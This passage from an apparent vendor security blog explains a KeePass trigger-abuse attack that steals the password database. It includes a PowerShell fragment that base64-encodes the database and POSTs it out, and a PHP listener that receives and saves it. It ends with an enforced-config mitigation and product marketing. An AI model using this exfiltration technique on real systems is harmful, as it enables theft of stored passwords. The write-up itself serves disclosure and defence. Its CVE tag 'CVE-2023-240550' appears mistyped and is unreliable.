-Method to use the POST request method and -Body to include the base64-encoded data of the passwords file in the body of the POST request.

([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('database_path'))) function to convert the data to base64 data and put it in the post-body request

Like the following picture

Patch info

The developer recently removed the Export - No Key Repeat application policy flag in KeePass. As a result, the program now always prompts the user to enter their current master_key when attempting to export data. However, it’s important to note that the patch did not cover the Execute command line \ URL feature. This means that an attacker could potentially use this feature to repeatedly execute malicious code, leading to Windows persistence through the same attack method which is trigger feature

Proof-Of-Concept

this POC I will exploit it manually but it can be automated as seen in the code we have all the important parameters and GUID’s value, it’s not a new bug there is a lot of automation script for this bug GhostPack which is A collection of security-related toolsets.

you find it here KeePassConfig.ps1

1. inject our trigger code to the configuration file KeePass.config.xml between

<TriggerSystem>the trigger code</TriggerSystem>

like the following picture:

2. setting up the attacker server I will use php a built-in web server as the attacker server which will receive and decode the base64 data by the following command php -S 0.0.0.0:80

and we will save this file in the same directory and run the command and wait for the request for the data

<?php

if($_SERVER['REQUEST_METHOD'] == 'POST'){
	$base64_string = file_get_contents('php://input');
	$binary_data = base64_decode($base64_string);
	$file_path = 'path/to/save/file.txt';
	if(file_put_contents($file_path, $binary_data)){
		echo 'File saved successfully.';
	} else {
		echo 'Error saving file.';
	}
}

Simply this code checks if the request is a POST method and retrieves base64-encoded content from the request body. It then decodes and saves the content to a specified file path.

3. while the victim opens the KeePass app the attacker will receive the data file like the following picture:

Mitigation

it’s highly recommended to keep all your applications and software up to date. However, you can be editing the enforced configuration file with the specific policy can be changed by using it’s only accessible for the Administrator account which it namedKeePass.config.enforced.xml

like the following code

<?xml version="1.0" encoding="utf-8"?>
<Configuration xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
   <Application>
      <TriggerSystem>
         <Enabled>false</Enabled>
      </TriggerSystem>
   </Application>
</Configuration>

The enforced configuration of KeePass disables the trigger feature at an administrator level for all users by default. This mitigation helps prevent unauthorized access, code injection, and data breaches by malicious actors.

Conclusion

As we have seen, we cannot always trust applications to be completely secure, even password managers. For instance, if an affected version of KeePass is used in an Active Directory environment, an attacker can gain access to the passwords of the entire organization.

#CVE-2023-240550

About Version 2 Digital

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

vRx 2023